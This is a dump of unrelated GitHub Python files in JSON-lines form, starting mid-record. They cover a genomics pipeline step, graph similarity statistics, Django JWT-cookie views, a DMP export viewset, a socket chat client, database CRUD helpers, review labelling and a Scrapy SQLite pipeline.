impl.mkdir(self.option.workdir,\"alignment\",self.option.multiSampleName)\n for sample_name in self.sample:\n bam = os.path.join(outdir,\"%s.sorted.bam\" % sample_name)\n if self.bamSort.get('index_program'):\n #cmd.append('if [ ! -e {}.bai ]\\nthen'.format(bam))\n cmd.append('{} index {}'.format(self.bamSort.index_program, bam))\n #cmd.append('fi')\n result.output[sample_name] = bam\n else:\n if self.bamSort.get('index_program'):\n #cmd.append('if [ ! -e ${OUTPUT}.bai ]\\nthen')\n cmd.append('%s index ${OUTPUT} -t 12' % self.bamSort.index_program)\n #cmd.append('fi')\n \n JobParamList = []\n for sampleName in inputInfo:\n hdfs_tmp = os.path.join(self.option.dirHDFS,sampleName,'tmp')\n tmp = impl.mkdir(self.option.workdir,\"temp\",sampleName)\n scriptsdir = impl.mkdir(self.gaeaScriptsDir,sampleName)\n outdir= impl.mkdir(self.option.workdir,\"alignment\",sampleName)\n \n if not self.option.multiSample:\n result.output[sampleName] = os.path.join(outdir,\"%s.sorted.bam\" % sampleName)\n\n #global param\n JobParamList.append({\n \"SAMPLE\" : sampleName,\n \"SCRDIR\" : scriptsdir,\n \"INPUT\": inputInfo[sampleName],\n \"OUTPUT\": result.output[sampleName] if not self.option.multiSample else '',\n \"OUTDIR\": 'file://%s' % outdir,\n \"BAMLIST\": os.path.join(tmp,\"hadoop_bam.list\"),\n \"HDFSTMP\":hdfs_tmp\n })\n \n \n #write script\n scriptPath = \\\n impl.write_scripts(\n name = 'bamSort',\n commands=cmd,\n JobParamList=JobParamList,\n paramDict=ParamDict)\n \n #result\n result.script.update(scriptPath) \n return result\n","repo_name":"jjmini/dmcade","sub_path":"Python/GaeaPipeline/workflow/H_bamSort.py","file_name":"H_bamSort.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16274789794","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#### File: Contains Functions Necessary To Calculate Similarity Distribution\n\n# Import necessary libraries\nfrom jaccard_index import *\nfrom edit_distance import *\n\n### Getting Similarity of Nodes (In A Graph)\n\ndef getNodeSimilarityDistribution(num_nodes, num_edges): \n dg = makeDirectedGraph(num_nodes, num_edges)\n \n similarity_data = getSimilarityData(dg)\n clique_data = getCliqueData(dg) \n similarity_data.update(clique_data)\n \n return pd.DataFrame(data = similarity_data)\n\n\n\n### Getting Similarity of Nodes for Multiple Graphs\n\ndef getGraphSimilarityList(num_graphs, num_nodes, num_edges): \n graph_sim_list = []\n \n for i in range(num_graphs):\n node_sim = getNodeSimilarityDistribution(num_nodes, num_edges)\n graph_sim_list.append(node_sim)\n \n return graph_sim_list\n\n\n## Helper Functions\n\ndef getSimilarityData(gm):\n node_list = list(gm.nodes)\n node_pairs = list(it.combinations(node_list, 2))\n\n ed_imm_sim, ed_full_sim, ji_sim = [], [], []\n\n for pair in node_pairs:\n ed_imm_sim.append(get_immediate_similarity(gm, pair[0], pair[1]))\n ed_imm_sim.append(get_immediate_similarity(gm, pair[1], pair[0]))\n\n ed_full_sim.append(get_full_similarity(gm, pair[0], pair[1]))\n ed_full_sim.append(get_full_similarity(gm, pair[1], pair[0]))\n\n ji_sim.append(calculate_similarity(gm, pair[0], pair[1]))\n ji_sim.append(calculate_similarity(gm, pair[1], pair[0]))\n\n similarity_data = {\"Edit-Distance Immediate Similarity\": ed_imm_sim, \n \"Edit-Distance Full Similarity\": ed_full_sim,\n \"Jaccard Index Similarity\": ji_sim}\n \n return similarity_data\n\n\ndef getCliqueData(gm):\n node_list = list(gm.nodes)\n num_rows = len(list(it.combinations(node_list, 2))) * 2\n \n longest_max_indep_set = len(independent_set.maximum_independent_set(gm))\n max_cliques = list(clique.clique_removal(gm)[1]) * num_rows\n num_max_cliques = len(max_cliques)\n longest_max_clique = len(max_cliques[0])\n \n clique_data = {\"Longest Maximal Independent Set\": [longest_max_indep_set] * num_rows,\n \"Number of Maximal Cliques\": [num_max_cliques] * num_rows, \n \"Longest Maximal Clique\": [longest_max_clique] * num_rows}\n \n return clique_data\n\n\n\n### Creating Similarity Distribution of Graphs\n\ndef getGraphSummaryRow(graph_summary, column_list): \n graph_summary_row = []\n \n for column in column_list:\n graph_summary_row.append(graph_summary[column][\"mean\"])\n graph_summary_row.append(graph_summary[column][\"50%\"])\n graph_summary_row.append(graph_summary[column][\"std\"])\n \n return tuple(graph_summary_row)\n\n\ndef getCondensedSimilarityDistribution(graph_dist_list, column_list, metrics):\n cols = pd.MultiIndex.from_product([column_list, metrics])\n similarity_dist = pd.DataFrame(index = [\"Graph Number\"], columns = cols)\n \n index = 0\n for graph_similarity in graph_dist_list:\n graph_summary = graph_similarity.describe(include=\"all\")\n graph_summary_row = getGraphSummaryRow(graph_summary, column_list)\n \n similarity_dist.loc[index,:] = graph_summary_row\n index += 1\n \n return similarity_dist\n","repo_name":"nico-espinosadice/abductive-theory","sub_path":"Similarity Python Files/similarity_distribution.py","file_name":"similarity_distribution.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39704730206","text":"from rest_framework.response import Response\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.viewsets import GenericViewSet\nfrom rest_framework_simplejwt.views import (TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n TokenBlacklistView,\n )\nfrom .auth import CookieJWTAuthentication\n\nfrom rest_framework.permissions import (IsAuthenticated,\n AllowAny,\n )\n# from rest_framework.status import (HTTP_200_OK,\n# HTTP_201_CREATED,\n# HTTP_400_BAD_REQUEST,\n# HTTP_202_ACCEPTED,\n# HTTP_403_FORBIDDEN,\n# )\n# from rest_framework.filters import (BaseFilterBackend,\n# SearchFilter,\n# OrderingFilter,\n# )\n# # from .models import (User,\n# Supplier,\n# Collector,\n# Order,\n# TypeOfGoods,\n# RecyclePoint,\n# Address,\n# )\n\nfrom .mixin import (UserOperationsMixin,\n RatingOperationsMixin,\n OrderOperationsMixin,\n TypeOfGoodsOperationsMixin,\n RecyclePointOperationsMixin,\n FilteredOrderOperationsMixin,\n )\n\nfrom .serializers import (MyTokenObtainPairSerializer,\n CookieTokenRefreshSerializer,\n CookieTokenBlackListSerializer\n )\n\n# as we deployed to different domain we need to set samesite to 'none'\nCOOKIES_SET_SAME_SITE = 'none'\nCOOKIES_SET_SECURE = True\nCOOKIES_SET_HTTPONLY = True\n\n\nclass CreateUserAPI (UserOperationsMixin, GenericAPIView):\n \"\"\"\n Special class, with only post method.\n Allowed new user creates an account witout autentication\n \"\"\"\n authentication_classes = []\n permission_classes = (AllowAny,)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\nclass ListUserAPI (UserOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated, )\n pass\n\n\nclass RatingAPI(RatingOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n\nclass OrderAPI(OrderOperationsMixin, GenericViewSet):\n authentication_classes = []\n permission_classes = (AllowAny,)\n pass\n\n\nclass FilteredOrderAPI(FilteredOrderOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n\nclass TypeOfGoodsAPI(TypeOfGoodsOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n\nclass RecyclePointAPI(RecyclePointOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n# Token autorzaion API\n\n\nclass CookieTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n def finalize_response(self, request, response, *args, **kwargs):\n if response.data.get('access'):\n response.set_cookie(\n 'access_token',\n response.data['access'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'refresh_token',\n response.data['refresh'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'user_info_token',\n f'{response.data[\"first_name\"]} {response.data[\"last_name\"]}',\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n )\n del response.data['access']\n del response.data['refresh']\n return super().finalize_response(request, response, *args, **kwargs)\n\n\nclass CookieTokenRefreshView(TokenRefreshView):\n serializer_class = CookieTokenRefreshSerializer\n\n def finalize_response(self, request, response, *args, **kwargs):\n if response.data.get('access'):\n response.set_cookie('access_token',\n response.data['access'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'refresh_token',\n response.data['refresh'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n del response.data['access']\n del response.data['refresh']\n return super().finalize_response(request, response, *args, **kwargs)\n\n\nclass CookieTokenVerifyView(TokenVerifyView):\n def post(self, request, *args, **kwargs):\n token = request.COOKIES.get('access_token')\n serializer = self.get_serializer(data={'token': token})\n serializer.is_valid(raise_exception=True)\n return Response({'detail': 'Token is valid'})\n\n\nclass CookieTokenBlacklistView(TokenBlacklistView):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated, )\n\n serializer_class = CookieTokenBlackListSerializer\n\n def finalize_response(self, request, response, *args, **kwargs):\n print('from blacklisted', response.data)\n response.set_cookie('access_token',\n 'cookie_was_blacklisted',\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'refresh_token',\n 'cookie_was_blacklisted',\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'user_info_token',\n 'cookie_was_blacklisted',\n )\n return super().finalize_response(request, response, *args, **kwargs)\n","repo_name":"Chekinm/bottle-buddy","sub_path":"backend/drf_project_root/bottles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17219208373","text":"from django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Prefetch\nfrom django.http import HttpResponse\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom django_changeset.models import ChangeSet\n\nfrom eric.core.rest.viewsets import DeletableViewSetMixIn, ExportableViewSetMixIn\nfrom eric.dmp.models import Dmp, DmpForm, DmpFormData\nfrom eric.dmp.rest.filters import DmpFilter\nfrom eric.dmp.rest.serializers import DmpSerializerExtended\nfrom eric.projects.rest.serializers import ChangeSetSerializer\nfrom eric.projects.rest.viewsets.base import (\n BaseAuthenticatedCreateUpdateWithoutProjectModelViewSet,\n LockableViewSetMixIn,\n)\n\n\nclass DmpViewSet(\n BaseAuthenticatedCreateUpdateWithoutProjectModelViewSet,\n DeletableViewSetMixIn,\n ExportableViewSetMixIn,\n LockableViewSetMixIn,\n):\n \"\"\"Viewset for dmps\"\"\"\n\n serializer_class = DmpSerializerExtended\n filterset_class = DmpFilter\n search_fields = ()\n\n ordering_fields = (\n \"title\",\n \"dmp_form\",\n \"status\",\n \"created_at\",\n \"created_by\",\n \"last_modified_at\",\n \"last_modified_by\",\n )\n\n @action(detail=True, methods=[\"POST\"])\n def duplicate(self, request, format=None, *args, **kwargs):\n \"\"\"\n Duplicates the DMP with all its answers.\n \"\"\"\n dmp_object = Dmp.objects.viewable().get(pk=kwargs[\"pk\"])\n duplicate_metadata = request.data.get(\"duplicate_metadata\", False)\n\n # Duplicates the DMP and changes the name to \"Copy of\" + DMP title\n duplicated_dmp = dmp_object.duplicate(\n title=_(\"Copy of\") + f\" {dmp_object.title}\",\n status=Dmp.NEW,\n dmp_form=dmp_object.dmp_form,\n projects=dmp_object.projects.all().values_list(\"pk\", flat=True),\n metadata=dmp_object.metadata.all() if duplicate_metadata else None,\n old_dmp_pk=dmp_object.pk,\n )\n\n serializer = self.get_serializer(duplicated_dmp)\n\n return Response(serializer.data)\n\n def get_queryset(self):\n \"\"\"\n returns the queryset for DMP viewable objects,\n filtered by project primary key (optional)\n :return:\n \"\"\"\n return Dmp.objects.viewable().prefetch_related(\n \"changesets\",\n \"projects\",\n Prefetch(\"dmp_form\", queryset=DmpForm.objects.viewable()),\n Prefetch(\"dmp_form_data\", queryset=DmpFormData.objects.viewable()),\n )\n\n @action(detail=True, methods=[\"GET\"])\n def export(self, request, format=None, *args, **kwargs):\n \"\"\"Endpoint for the DMP Export\"\"\"\n if \"type\" in request.query_params:\n type = request.query_params[\"type\"]\n else:\n type = \"pdf\"\n\n if type == \"pdf\":\n return ExportableViewSetMixIn.export(self, request, *args, **kwargs)\n\n dmp_object = Dmp.objects.get(pk=kwargs[\"pk\"])\n dmp_form_data_objects = DmpFormData.objects.filter(dmp=dmp_object.pk)\n context = {\n \"dmp\": dmp_object,\n \"dmp_form_data\": dmp_form_data_objects,\n }\n\n if type == \"html\":\n filepath = \"export/export_html.html\"\n filename = \"dmpexport.html\"\n export = render_to_string(filepath, context)\n\n elif type == \"txt\":\n filepath = \"export/export_txt.txt\"\n filename = \"dmpexport.txt\"\n export = render_to_string(filepath, context).replace(\"\\n\", \"\\r\\n\")\n elif type == \"xml\":\n filepath = \"export/export_xml.xml\"\n filename = \"dmpexport.xml\"\n export = render_to_string(filepath, context)\n\n response = HttpResponse(export)\n response[\"Content-Disposition\"] = f'attachment; filename=\"{filename}\"'\n # Deactivate debug toolbar by setting content type != text/html\n response[\"Content-Type\"] = \"download;\"\n return response\n\n\nclass DmpChangeSetViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"Viewsets for changesets in dmps\"\"\"\n\n serializer_class = ChangeSetSerializer\n queryset = ChangeSet.objects.none()\n\n def get_queryset(self):\n return ChangeSet.objects.filter(object_type=ContentType.objects.get_for_model(Dmp))\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/dmp/rest/viewsets/dmps.py","file_name":"dmps.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"19066062841","text":"import unittest\nfrom . import run_doozer, get_working_dir\nimport os\n\n\nclass TestCleanup(unittest.TestCase):\n def test_cleanup(self):\n # to initialize working directory\n working_dir = get_working_dir()\n _, out, _ = run_doozer([\n \"--group=openshift-3.11\",\n \"config:get\"\n ])\n # doing cleanup\n _, out, _ = run_doozer([\n \"--group=openshift-3.11\",\n \"cleanup\"\n ])\n # ensure everyting except settings.yaml is cleaned up\n for f in os.listdir(working_dir):\n self.assertFalse(f != \"setting.yaml\", \"{} is not deleted.\".format(f))\n","repo_name":"openshift-eng/doozer","sub_path":"functional_tests/test_cleanup.py","file_name":"test_cleanup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"1194991422","text":"'''write a program that prints out the sine and cosine of\nthe angles ranging from 0 to 345 degrees in 15 degrees increments\neach result should be rounded to 4 decimal places\n'''\n#import sin and cosine -- trigonometry functions\nimport math\n\nfor i in range(0,350,15):\n #math.radians -- radians to degrees conversion\n x = math.sin(math.radians(i))\n y = math.cos(math.radians(i))\n print(i, round(x,4), round(y,4))\n","repo_name":"ErnieM02/Coding_3rdYear","sub_path":"MP_mathlab.py","file_name":"MP_mathlab.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20129185949","text":"#!/usr/bin/python3\n\nimport xlrd, xlwt\nfrom xlutils.copy import copy\nfrom createPattern import createPattern\n\nGROUP = \"ГРУППЫ_МОЭВМ.xls\"\nSUBJ_TABLE = \"groups\"\nLECT_TABLE = \"lections\"\nTT_PATTERN = \"timetablePattern.xls\"\n\ndef open_read_wrksht():\n rb = xlrd.open_workbook(GROUP,\n on_demand=True,\n formatting_info=True)\n return rb.sheet_by_index(0)\n\n\ndef get_data_from_groups_files():\n rb = open_read_wrksht() \n wb = createPattern(TT_PATTERN)\n wb_lection = createPattern(TT_PATTERN)\n for sem in range(0,2):\n worksheet = wb.get_sheet(sem) #change sem\n worksheet_lection = wb_lection.get_sheet(sem)\n r_row = 0\n w_lect_row = 1\n w_row = 1\n while r_row < 4:\n worksheet,worksheet_lection,w_row,w_lect_row = get_subj(worksheet,worksheet_lection, rb, w_row, w_lect_row,r_row, sem)\n w_row += 1\n r_row += 1\n create_border(worksheet, w_row) # write END for valid stopping\n create_border(worksheet_lection, w_lect_row) # of program\n wb.save(\"pract.xls\")\n wb_lection.save(\"lect.xls\")\n\n\ndef create_border(sheet, row):\n for col in range(0,5):\n sheet.write(row, col, \"END\")\n return\n\n\ndef get_read_sheet(rb, r_row):\n read_wb = xlrd.open_workbook(rb.cell(r_row,4).value,\n on_demand=True,\n formatting_info=True)\n course = str(int(rb.cell(r_row,0).value))\n print(\"course\", course)\n return read_wb.sheet_by_name(\"Курс\" + course), course\n\n\n\ndef get_subj(worksheet,worksheet_lection, rb,w_row,w_lect_row, r_row, sem):\n read_sheet, course = get_read_sheet(rb, r_row)\n if course == '1':\n border = 'Элективные курсы по физической культуре'\n start = 16\n elif course == '2':\n border = 'Элективные курсы по физической культуре'\n start = 28\n elif course == '3':\n border = 'Производственная практика'\n start = 45\n else:\n border = 'Военная подготовка (Обучение граждан по программе военной подготовки офицеров запаса на факультете военного обучения (военной кафедре))'\n start = 73\n for row in range(start, read_sheet.nrows):\n if read_sheet.cell(row,4).value == border:\n break\n if sem == 0:\n lab_col = 10\n flag = (read_sheet.cell(row, 6).value != '')\n else:\n lab_col = 20\n flag = (read_sheet.cell(row, 16).value != '')\n if str(read_sheet.cell(row,36).value) == \"14\" and flag:\n\n if read_sheet.cell(row,lab_col-1).value != '':\n worksheet_lection.write(w_lect_row, 0, course)\n worksheet_lection.write(w_lect_row, 1, \n read_sheet.cell(row,4).value)\n worksheet_lection.write(w_lect_row, 2, \n rb.cell(r_row,1).value)\n\n if read_sheet.cell(row,lab_col).value != '':\n worksheet.write(w_row, 0, course)\n worksheet.write(w_row, 1, \n read_sheet.cell(row,4).value)\n worksheet.write(w_row, 2, \n rb.cell(r_row,1).value)\n worksheet.write(w_row, 3, \"Лаб\")\n\n if read_sheet.cell(row,lab_col+1).value != '':\n w_row += 1\n worksheet.write(w_row, 0, course)\n worksheet.write(w_row, 1, \n read_sheet.cell(row,4).value)\n worksheet.write(w_row, 2, \n rb.cell(r_row,1).value)\n worksheet.write(w_row, 3, \"Пр\")\n w_row += 1\n w_lect_row += 1\n return worksheet,worksheet_lection,w_row, w_lect_row\n\n\n\nif __name__ == '__main__':\n get_data_from_groups_files()\n","repo_name":"PutkovDimi/moevm_automize_report","sub_path":"read_groups.py","file_name":"read_groups.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15390602862","text":"import connect\n\ndb = connect.koneksi()\n#menambahkan data baru ke dalam tabel pegawai\ndef add(data):\n cursor = db.cursor()\n sql = \"\"\"INSERT INTO pelanggan(nama_pelanggan,alamat_pelanggan,email_pelanggan)VALUES(%s,%s,%s)\"\"\"\n cursor.execute(sql,data)\n db.commit()\n print('{}Data Pelanggan berhasil ditambah!'.format(cursor.rowcount))\n\n#menampilkan seluruh data dari tabel pegawai\ndef show():\n cursor=db.cursor()\n sql=\"\"\"SELECT*FROM pelanggan\"\"\"\n cursor.execute(sql)\n results = cursor.fetchall()\n print('---------------------------------------------------------')\n print(\"| ID | NAMA\\t\\t| ALAMAT\\t\\t| EMAIL PELANGGAN\\t\\t\")\n print('---------------------------------------------------------')\n for data in results:\n print(\"|\",data[0],\" |\",data[1],\"\\t\\t|\",data[2],\"\\t\\t\\t\\t|\",data[3],\"\\t\\t|\")\n print('---------------------------------------------------------')\n\n#mengubah data per record berdasarkan id pada tabel pegawai\ndef edit(data):\n cursor = db.cursor()\n sql = \"\"\"UPDATE Pelanggan SET nama_pelanggan=%s,alamat_pelanggan=%s,email_pepelanggan=%s WHERE id_pelanggan=%s\"\"\"\n cursor.execute(sql,data)\n db.commit()\n print('{}Data Pelanggan berhasil diubah!'.format(cursor.rowcount))\n\n#menghapus data dari tabel pegawai\ndef delete(data):\n cursor = db.cursor()\n sql=\"\"\"DELETE FROM pelanggan WHERE id_pelanggan=%s\"\"\"\n cursor.execute(sql,data)\n db.commit()\n print('{}Pelanggan berhasil dipecat!'.format(cursor.rowcount))\n\n#mencari data dari tabel pegawai\ndef search(id_pelanggan):\n cursor = db.cursor()\n sql=\"\"\"SELECT*FROM pelanggan WHERE id_pelanggan=%s\"\"\"\n cursor.execute(sql,id_pelanggan)\n results = cursor.fetchall()\n print(\"------------------------------------------------\")\n print(\"|ID|NAMA\\t\\t ALAMAT\\t\\t EMAIL PELANGGAN\\t\\t\")\n print(\"------------------------------------------------\")\n for data in results:\n print(\"|\",data[0],\"|\",data[1],\"\\t\\t\",data[2],\"\\t\\t\",data[3],\"\\t\\t|\")\n print('----------------------------------------')\n","repo_name":"YudhanJeffri/TokoBuah","sub_path":"function/pelanggan.py","file_name":"pelanggan.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"21652721251","text":"import socket\nimport time\nfrom _thread import start_new_thread\n\n#HOST = \"10.199.35.238\" # The server's hostname or IP address\nHOST = \"127.0.0.1\"\nPORT = 20001 # The port used by the server\nname = input(\"Enter a name: \\n\")\nrunning = True\n\n#uma thread que so busca as novas mensagens no chat\n#cada instancia possui um contador de controle para saber quais mensagens ja foram baixadas\ndef receiveMessagesThread():\n lastMessage = 0\n while(running):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n data = bytes(\"getMessages():\"+str(lastMessage), 'utf-8')\n s.sendall(data)\n data = s.recv(1024)\n receivedString = data.decode('utf-8')\n if(receivedString != \"empty\"):\n print(receivedString)\n lastMessage += 1\n s.close()\n time.sleep(1)\n\n#inicializa a thread auxliar que busca mensagens\nstart_new_thread(receiveMessagesThread, ())\n\n#loop principal que fica controlando o envio das mensagens de um cliente\nwhile(running):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n msg = input(\"Enter a message (type 'exit' to finish):\\n\")\n s.connect((HOST, PORT))\n if(msg == \"exit\"):\n print(\"\\nChat finished\\n\")\n running = False\n msg = name+\": left the chat\"\n dataSend = \"\\n\"+name+\":\\n\"+ msg\n data = bytes(dataSend , 'utf-8')\n s.sendall(data)\n data = s.recv(1024)\n s.close()\n receivedString = data.decode('utf-8')\n if(receivedString != \"empty\"):\n print(\"\\n\"+receivedString)\n time.sleep(1)\n\n","repo_name":"ricardohaas/pos-big-data-and-data-science","sub_path":"03-programacao-paralela-e-distribuida/19-echo-client.py","file_name":"19-echo-client.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17770230801","text":"import json\n\n\ndef method1(file_in, file_pos, file_neg, file_ukn):\n fi = open(file_in, mode='r', encoding='utf-8')\n fpos = open(file_pos, mode='w', encoding='utf-8')\n fneg = open(file_neg, mode='w', encoding='utf-8')\n fukn = open(file_ukn, mode='w', encoding='utf-8')\n pos_review = []\n neg_review = []\n ukn_review = []\n for review in json.load(fi):\n # cases satisfying all following conditions will be annotated as 1 (valuable)\n # 1. length of the review(body) > 5\n # 2. more than half of people vote for the review\n # 3. total number of people who vote > 10\n #\n # such cases will be annotated as -1 (need to be annotated manually)\n # 1. new reviews posted after 525 (based on previous analysis) with vote <= 10\n # 2. percentage of people who vote for the review <= 0.5 but > 0.4\n #\n # else cases will be annotated as 0 (not valuable)\n if len(review['review_body'].split()) > 5 and \\\n review['helpful_score'] > 0.5 and \\\n review['total_vote'] > 10:\n annotated_review = {\n \"label\": 1,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n pos_review.append(annotated_review)\n elif (review['date_para'] > 525 and review['total_vote'] <= 10) or \\\n 0.4 < review['helpful_score'] <= 0.5:\n annotated_review = {\n \"label\": -1,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n ukn_review.append(annotated_review)\n else:\n annotated_review = {\n \"label\": 0,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n neg_review.append(annotated_review)\n print('Pos num: ' + str(len(pos_review)))\n print('Neg num: ' + str(len(neg_review)))\n print('Unk num: ' + str(len(ukn_review)))\n fpos.write(\n json.dumps(\n pos_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n fneg.write(\n json.dumps(\n neg_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n fukn.write(\n json.dumps(\n ukn_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n\n\ndef method2(file_in, file_pos, file_neg):\n \"\"\"\n extract positive samples an negative samples from file_in, then write them into file_pos and file_neg\n reviews with total number of votes less then a or number of words less than b will be discarded;\n remaining reviews with helpful score >= c will be annotated as helpful (positive)\n remaining reviews with helpful_score <= d will be annotated as unhelpful (negative)\n a, b, c, d are parameters and are obtained from experiment\n :param file_in: path of the input file\n :param file_pos: path of the positive file\n :param file_neg: path of the negative file\n :return:\n \"\"\"\n fi = open(file_in, mode='r', encoding='utf-8')\n fpos = open(file_pos, mode='w', encoding='utf-8')\n fneg = open(file_neg, mode='w', encoding='utf-8')\n pos_review = []\n neg_review = []\n for review in json.load(fi):\n if review['total_vote'] >= 10 and len(review['review_body'].split()) >= 5:\n if review['helpful_score'] >= 0.65:\n annotated_review = {\n \"label\": 1,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n pos_review.append(annotated_review)\n elif review['helpful_score'] <= 0.5:\n annotated_review = {\n \"label\": 0,\n \"title\": review['review_title'],\n \"body\": review['review_body'],\n \"platform\": review['platform'],\n \"score\": review['helpful_score'],\n \"vote\": review['total_vote']\n }\n neg_review.append(annotated_review)\n\n print('Pos num: ' + str(len(pos_review)))\n print('Neg num: ' + str(len(neg_review)))\n fpos.write(\n json.dumps(\n pos_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n fneg.write(\n json.dumps(\n neg_review,\n ensure_ascii=True,\n sort_keys=True,\n indent=4,\n separators=(',', ': ')\n )\n )\n\n\nif __name__ == '__main__':\n file_in = '../data/fortnite_review_full_sorted.json'\n file_pos = '../data/pos.json'\n file_neg = '../data/neg.json'\n file_ukn = '../data/ukn.json'\n method2(file_in, file_pos, file_neg)","repo_name":"WangYipeng0624/helpfulness_prediction","sub_path":"util/machine_annotate.py","file_name":"machine_annotate.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41535756576","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n#class HhParserPipeline(object):\n# def process_item(self, item, spider):\n# return item\n\nfrom datetime import *\n\nimport sqlite3\nimport os\n\nfrom scrapy import signals\nfrom scrapy.xlib.pydispatch import dispatcher\n\n\n#class GismeteoParserPipeline(object):\n# def process_item(self, item, spider):\n# return item\n\nclass SQLiteStorePipeline(object):\n filename = '../database/hh.db'\n\n def __init__(self):\n if not os.path.isdir('../database/'):\n os.mkdir('../database/')\n\n self.conn = None\n dispatcher.connect(self.initialize, signals.engine_started)\n dispatcher.connect(self.finalize, signals.engine_stopped)\n\n def process_item(self, item, spider):\n try:\n #date = datetime.now()\n #date = str(date)\n #date = date[:10]\n #item['DATE'] = date\n\n self.conn.execute('INSERT INTO db VALUES(?,?,?,?)',\n (\n item['COUNTRY'], item['INDUSTRY'], item['COMPANY'], item['COMPANY_URL']\n )\n )\n except:\n print('Failed to insert item')\n return item\n\n def initialize(self):\n if os.path.exists(self.filename):\n self.conn = sqlite3.connect(self.filename)\n else:\n self.conn = self.create_table(self.filename)\n\n def finalize(self):\n if self.conn is not None:\n self.conn.commit()\n self.conn.close()\n self.conn = None\n\n def create_table(self, filename):\n conn = sqlite3.connect(filename)\n conn.execute('CREATE TABLE IF NOT EXISTS db'\n '('\n 'country TEXT, industry TEXT, company TEXT, company_url TEXT'\n ')'\n )\n\n conn.commit()\n return 